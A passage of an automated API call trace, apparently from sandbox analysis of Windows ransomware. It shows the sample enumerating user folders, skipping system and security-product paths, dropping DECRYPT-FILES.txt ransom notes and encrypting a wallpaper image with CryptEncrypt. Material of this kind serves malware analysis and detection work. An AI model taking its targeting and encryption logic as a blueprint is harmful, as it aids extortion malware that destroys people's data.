lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*" [0080.457] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0080.457] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.457] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.457] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.458] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.458] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac265d40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.458] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.458] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac265d40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.458] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.458] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.458] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.458] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.458] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.458] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.458] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.458] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.458] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.458] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.458] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.458] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.458] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.458] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.458] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.458] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 74 [0080.458] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.458] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\" [0080.458] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\jkbimi8.tmp" [0080.458] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.458] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\templates\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.459] CloseHandle (hObject=0x0) returned 0 [0080.459] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.459] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac265d40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0080.459] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0080.459] CloseHandle (hObject=0x450) returned 1 [0080.459] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0080.459] lstrcmpW (lpString1="Themes", lpString2=".") returned 1 [0080.459] lstrcmpW (lpString1="Themes", lpString2="..") returned 1 [0080.459] lstrcatW (in: lpString1="Themes", lpString2="\\" | out: lpString1="Themes\\") returned="Themes\\" [0080.459] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Themes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" [0080.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Program Files") returned 0x0 [0080.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch=":\\Windows") returned 0x0 [0080.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Games\\") returned 0x0 [0080.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.459] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\All Users") returned 0x0 [0080.460] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.460] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.460] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.460] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="AhnLab") returned 0x0 [0080.460] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.460] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 71 [0080.460] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.460] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\jkbimi8.tmp") returned 83 [0080.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0080.460] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 71 [0080.460] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.460] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\DECRYPT-FILES.txt") returned 89 [0080.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0080.461] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0080.462] CloseHandle (hObject=0x454) returned 1 [0080.463] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 71 [0080.463] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*" [0080.463] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0080.463] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.463] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.463] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.463] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.463] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac265d40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac28bea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.463] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.463] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac265d40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac265d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0080.463] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0080.463] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0080.463] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0080.463] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0080.463] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0080.463] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0080.463] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0080.463] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0080.463] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0080.463] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0080.463] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.463] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0080.464] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0080.464] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0080.464] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0080.464] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 71 [0080.464] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.464] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" [0080.464] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\jkbimi8.tmp" [0080.464] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.464] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0080.464] CloseHandle (hObject=0x0) returned 0 [0080.464] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.464] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd9d7d3c0, ftLastWriteTime.dwHighDateTime=0x1d3373f, nFileSizeHigh=0x0, nFileSizeLow=0x9cfab, dwReserved0=0x0, dwReserved1=0x0, cFileName="TranscodedWallpaper.jpg", cAlternateFileName="TRANSC~1.JPG")) returned 1 [0080.464] lstrcmpiW (lpString1="TranscodedWallpaper.jpg", lpString2="DECRYPT-FILES.txt") returned 1 [0080.464] lstrcmpiW (lpString1="TranscodedWallpaper.jpg", lpString2="autorun.inf") returned 1 [0080.464] lstrcmpiW (lpString1="TranscodedWallpaper.jpg", lpString2="boot.ini") returned 1 [0080.464] lstrcmpiW (lpString1="TranscodedWallpaper.jpg", lpString2="desktop.ini") returned 1 [0080.464] lstrcmpiW (lpString1="TranscodedWallpaper.jpg", lpString2="ntuser.dat") returned 1 [0080.465] lstrcmpiW (lpString1="TranscodedWallpaper.jpg", lpString2="iconcache.db") returned 1 [0080.465] lstrcmpiW (lpString1="TranscodedWallpaper.jpg", lpString2="bootsect.bak") returned 1 [0080.465] lstrcmpiW (lpString1="TranscodedWallpaper.jpg", lpString2="ntuser.dat.log") returned 1 [0080.465] lstrcmpiW (lpString1="TranscodedWallpaper.jpg", lpString2="thumbs.db") returned 1 [0080.465] lstrcmpiW (lpString1="TranscodedWallpaper.jpg", lpString2="Bootfont.bin") returned 1 [0080.465] lstrlenW (lpString="TranscodedWallpaper.jpg") returned 23 [0080.465] lstrcmpiW (lpString1="jpg", lpString2="lnk") returned -1 [0080.465] lstrcmpiW (lpString1="jpg", lpString2="exe") returned 1 [0080.465] lstrcmpiW (lpString1="jpg", lpString2="sys") returned -1 [0080.465] lstrcmpiW (lpString1="jpg", lpString2="dll") returned 1 [0080.465] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 71 [0080.465] lstrlenW (lpString="TranscodedWallpaper.jpg") returned 23 [0080.465] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" [0080.465] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpString2="TranscodedWallpaper.jpg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" [0080.465] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0080.465] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=642987) returned 1 [0080.465] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0080.465] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x37e0000 [0080.466] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.466] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.466] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.467] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0080.467] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.476] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.476] UnmapViewOfFile (lpBaseAddress=0x37e0000) returned 1 [0080.484] CloseHandle (hObject=0x45c) returned 1 [0080.484] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.484] WriteFile (in: hFile=0x458, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0080.485] CloseHandle (hObject=0x0) returned 0 [0080.485] CloseHandle (hObject=0x458) returned 1 [0080.492] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.492] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.492] GetTickCount () returned 0x114c9b6 [0080.492] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.502] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.502] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.502] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.502] lstrlenA (lpString="kernel32.dll") returned 12 [0080.502] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.502] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.502] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.502] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.502] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.502] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.502] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.502] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.502] lstrlenA (lpString="ADDATOMA") returned 8 [0080.502] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.502] lstrlenA (lpString="ADDATOMW") returned 8 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.503] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.503] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.503] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.503] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.503] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.503] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.503] lstrcpyA (in: 